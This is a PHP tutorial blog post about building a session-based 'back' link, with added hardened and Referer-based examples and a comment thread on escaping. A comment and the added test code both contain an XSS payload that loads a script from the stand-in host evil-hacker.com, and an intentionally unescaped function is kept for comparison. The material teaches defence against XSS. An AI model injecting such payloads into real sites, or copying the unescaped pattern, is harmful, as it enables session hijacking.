While working on one of our projects we needed a link that takes you to the previous page within the same site.
We googled and found many approaches that were more complex than necessary. After thinking it over, we realised the logic is very simple and needs only a few lines of code.
Our requirement was for a Drupal site, so the logic is in PHP. Here it goes [sharing is our policy]:
<?php
session_start(); // start the session before any output, i.e. before the DOCTYPE
$back = isset($_SESSION['back']) ? $_SESSION['back'] : '/'; // first visit: nothing stored yet, fall back to the front page
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<a href="<?php echo htmlspecialchars($back, ENT_QUOTES, 'UTF-8'); ?>">back</a> <!-- The anchor tag that links to the previous page; escaped on output so the URL cannot break out of the attribute -->
<?php $_SESSION['back'] = $_SERVER['REQUEST_URI']; ?> <!-- Now remember the current URL for the next page -->
Please note the order: first we read the previous URL out of the session variable into the anchor tag, and only then overwrite the session variable with the current URL, which will be read when you move on to the next page. Also note that $_SERVER['REQUEST_URI'] is taken verbatim from the request line, so treat it as untrusted: escape it (htmlspecialchars with ENT_QUOTES, or htmlentities) when writing it into the href, otherwise a crafted URL can close the attribute and inject markup. One limitation of keeping a single "back" value per session is that several tabs open on the same site overwrite each other's previous page.
Being plain PHP, this snippet can be used in almost any PHP-based CMS and is a useful addition to the accessibility of your site.
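As an added example (not code from the original post), here is the same idea factored into a function so it can be exercised with constructed input, with the unescaped variant beside it for comparison. The session array is passed in as a parameter instead of using $_SESSION directly, and the hostile request URI is a constructed sample modelled on the kind of payload an attacker would send by hand; both are assumptions made for the demonstration.

```php
<?php
// Added example, not from the original post: hardened "back" link.
// The session stores the raw REQUEST_URI; escaping happens at output time,
// so whatever the client put in the request line is rendered as text only.

function back_href(array &$session, string $request_uri, string $default = '/'): string
{
    // Read the previous page first; fall back to $default on the first visit
    // (the original snippet would emit an "undefined index" notice here).
    $previous = isset($session['back']) ? $session['back'] : $default;

    // Then remember the current page for the next request.
    $session['back'] = $request_uri;

    // Escape for an HTML attribute context. ENT_QUOTES also converts single
    // quotes, so the value is safe inside either quote style.
    return htmlspecialchars($previous, ENT_QUOTES, 'UTF-8');
}

function vulnerable_back_link(array &$session, string $request_uri): string
{
    // The unescaped form the comment thread warns about, kept for comparison only.
    $previous = isset($session['back']) ? $session['back'] : '/';
    $session['back'] = $request_uri;
    return '<a href="' . $previous . '">back</a>';
}

// Constructed sample request (assumption for this demo), modelled on the payload
// quoted in the comments. A browser normally percent-encodes the quotes; a
// hand-crafted request (curl, an intercepting proxy) delivers them raw.
$hostile = '/?"><script src="http://evil-hacker.com/ruin-everything.js"></script><a href="#';

// Hardened version: first request stores the hostile URI, second one renders it.
$session = [];
echo '<a href="' . back_href($session, $hostile) . '">back</a>', "\n";   // href="/" (nothing stored yet)
echo '<a href="' . back_href($session, '/about') . '">back</a>', "\n";   // quotes and angle brackets entity-encoded

// Unescaped version over the same two requests: the second line of output
// contains a live <script> element.
$session = [];
vulnerable_back_link($session, $hostile);
echo vulnerable_back_link($session, '/about'), "\n";
```

In a real page the call is back_href($_SESSION, $_SERVER['REQUEST_URI']) after session_start(). The point of the split is that the stored value is never trusted: it is escaped at the moment it is written into HTML, regardless of how it got into the session.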
Comments
The one problem with this method is if a user has multiple browsers open on the same site. The sessions get mixed up and copy over to each browser session.
This is really cool since IE has JS switched off by default.
This whole MS stupid game is utter madness and makes life hell for web designers/developers (esp. inexperienced ones like me).
Thanks to dezignerfolio and sites with a similar mentality of assisting each other, sanity is still alive and well on the net.
Thanks also for the dfGrid 1.0
Fascinating ... I must investigate prototype
cha
t3rry
Hmmm, I'm not sure why Melanie Baker and I are having the same problem. I am clearly a neophyte, but I have done a little php coding before. Here however I just don't know what constitutes a "session." Am I to put all the code you indicated above into a single page of my Drupal site? Am I to put it on every page? Certain pages? Some of it on one page and some of it on the referred-to pages? I just don't know. But my "back" link keeps getting set to:
http://www.normanbobrow.com/”“
which is of course a page that doesn't exist.
Please if you could add a few more words of explanation, it would really help us out a lot. Thanks.
Hi, I'm having trouble with this code. I keep getting the message: The requested URL /”“ was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Any suggestions?? Thanks
Good stuff. On a side note, I really dig your work, awesome style all around.
@atom - totally agree, users can use htmlentities to strip the characters so that no script tag loads...
Thanks for the healthy arguments, this helps us too to understand concepts better.
I will rewrite the post adding html entities
I'm impressed nobody said this only works if the user opens only one page at a time. If you happen to open more than one window of the site, clicking on a link of an "old" (not the immediate last) window will get wrong results.
IMHO, the best solution still is http referrers (filtering out referrers from other domains, naturally).
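The Referer-based alternative suggested in the comment above, written out as an added example (not the commenter's or the original post's code), including the cross-domain filtering the commenter says is required. The site's own scheme and host are passed in explicitly; the sample header values are constructed for the demonstration.

```php
<?php
// Added example, not from the original post: "back" link derived from the
// Referer header, used only when it points at this site's own origin.

function back_from_referer(?string $referer, string $own_scheme, string $own_host, string $default = '/'): string
{
    if ($referer === null || $referer === '') {
        return $default; // header absent: typed URL, privacy settings, bookmark
    }
    $parts = parse_url($referer);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return $default; // not an absolute URL we can vet
    }
    if (strcasecmp($parts['scheme'], $own_scheme) !== 0 || strcasecmp($parts['host'], $own_host) !== 0) {
        return $default; // another origin: do not send the user there
    }
    // Keep only path and query. Re-issuing a relative link means the browser
    // resolves it against our own origin, whatever else the header contained.
    $path = isset($parts['path']) ? $parts['path'] : '/';
    if (isset($parts['query'])) {
        $path .= '?' . $parts['query'];
    }
    return $path;
}

function referer_back_link(?string $referer, string $own_scheme, string $own_host): string
{
    $href = back_from_referer($referer, $own_scheme, $own_host);
    // Still escape on output: the path and query are attacker-controlled text.
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">back</a>';
}

// Constructed sample Referer values for a site assumed to live at https://www.example.com.
$cases = [
    'https://www.example.com/news?page=2',       // same origin: used
    'https://evil-hacker.com/lure',              // other host: dropped
    'http://www.example.com/news',               // scheme mismatch: dropped
    'https://www.example.com.evil-hacker.com/',  // suffix trick: dropped (exact host compare)
    'https://www.example.com/x?"><script>',      // same origin but hostile text: escaped
    null,                                        // header missing: default
];
foreach ($cases as $ref) {
    echo referer_back_link($ref, 'https', 'www.example.com'), "\n";
}
```

In a real page the header comes from $_SERVER['HTTP_REFERER'] (missing when not sent, so use isset or the ?? operator). Compare against a configured hostname rather than $_SERVER['HTTP_HOST'], since the Host header is also supplied by the client.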
@dfadmin
Yes, it works fine, for you. As stated in my first comment this behavior("is by default urlencoded") is not universal, and is entirely dependent on the configuration of the server. An inexperienced user may not have any idea how their server is configured, especially if they are using one of the many popular hosts who are far more concerned with convenience than security.
This method should not be used in any distributed software, as you will never be sure the type of configuration the server will have.
To anyone reading this:
Do yourself a favor and wrap any output in htmlentities().
@atom - I just took the code as mentioned and dumped it into a PHP file.
Then I tried inserting the XSS attack that you mentioned and I got HTML code as below
back
This shows that any GET parameters you pass in the URL are by default URL-encoded, hence the insert is just a string and not HTML.
- Navin
@dfadmin - You are mistaken here, the point is not to include the url in the a tag, it is to break out of that tag and then run the code you want to. People who craft xss attacks are clever, and will figure out how to run the code if you give them a chance.
Accessed:
http://site.com/?"><script src="http://evil-hacker.com/ruin-everything.js"></script><a href="#
Your back link:
<a href=""><script src="http://evil-hacker.com/ruin-everything.js"></script><a href="#">back</a>
In the above example, the script gets executed, someone hijacks your wordpress session, and then proceeds to ruin your site.